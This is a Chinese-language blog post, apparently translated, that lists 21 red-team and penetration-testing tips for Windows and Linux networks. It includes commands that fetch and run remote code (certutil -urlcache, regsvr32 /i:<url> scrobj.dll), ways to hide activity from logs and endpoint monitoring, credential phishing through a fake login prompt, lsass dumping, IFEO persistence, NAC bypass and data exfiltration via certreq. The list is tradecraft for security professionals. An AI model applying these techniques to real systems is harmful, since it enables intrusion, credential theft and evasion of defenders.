红队与渗透测试tips

2018-09-22 47,924

我收集了一些渗透测试tips,同时欢迎大家补充。


1.使用高知名度的网站(如:Google aws)做C&C 控制服务器,这样可以绕过白名单限制


2.使用cleanwipe删除文件,因为它不需要管理员权限;

(工具见:https://support.symantec.com/en_US/article.HOWTO124983.html  


3.扫描所有的内网网段192.168.0.0/16,172.16.0.0/12,10.0.0.0/8),而不是你所在的内网网段,你可能会发现一些被遗忘的网络或主机;


4.使用 net user /dom 代替 net user /domain,因为net user /domain关键词 有可能被终端安全软件监控着;


5.使用wmiexec 代替 psexec,因为wmiexec留下更好的日志记录;


6. Windows下,如果你想上传文件到磁盘,请使用Invoke-ADSBackdoor.ps1https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1 )这个脚本。


7.如果你有一个windows低权限的shell,你可以使用fake login prompthttps://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1)来钓鱼获取帐号密码


8.如果你不想在肉鸡里使用mimikatz获取明文密码,你可以把lsass dump下来,拷贝在本地进行分析


9.使用ssh -l username  target -T 登陆ssh,这样可以避免被wtmp记录


10. 在退出ssh时候,使用 kill -9 $$  ,这样不会在bash history中留下日志;


11. 在联网时,如果你发现你被NAC屏蔽了,你可以监听广播收集mac地址,然后使用打印机的mac地址接入网络;


12. 隐藏自己真实目的,可以用nessusnetsparker等扫描外网,或小量Dos/DDos攻击外网IP,这样迷惑蓝队;


13.使用ROPEMAKER CVE-2017-0199  进行邮件钓鱼;(ROPEMAKER 开心就好了)


14.可以使用 certutil.exe 下载文件,使用方法为:certutil -urlcache -split -f <url> <out_filename>


15.可以使用regsrv32 /s /u dll_name 执行我们的dll


16.可以使用regsvr32 /s /n /u /i:<url> scrobj.dll  加载执行远程的脚本;


17.网络钓鱼中,我们可以利用smtp relay 


18.你可以用目标的主机名作为密码来加密你的payload或者word 宏;


19.你可以用HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options Debugger 值来保持权限;


20.在使用自动化扫描工具时,你需要限制连接数,避免网络丢包或者IP被封;


21.可以使用certreq.exe 进行Windows的数据隐蔽窃取;


翻译原文来自:http://synack.blog/posts/red-teaming-and-pentesting-tips/index.html%EF%BC%8C%E8%BF%99%E7%82%B9%E8%A7%89%E6%82%9F%E9%83%BD%E6%B2%A1%E6%9C%89


本文作者:ReadOnly

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/75843.html

Tags:
评论  (5)
快来写下你的想法吧!

ReadOnly

文章数:3 积分: 20

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号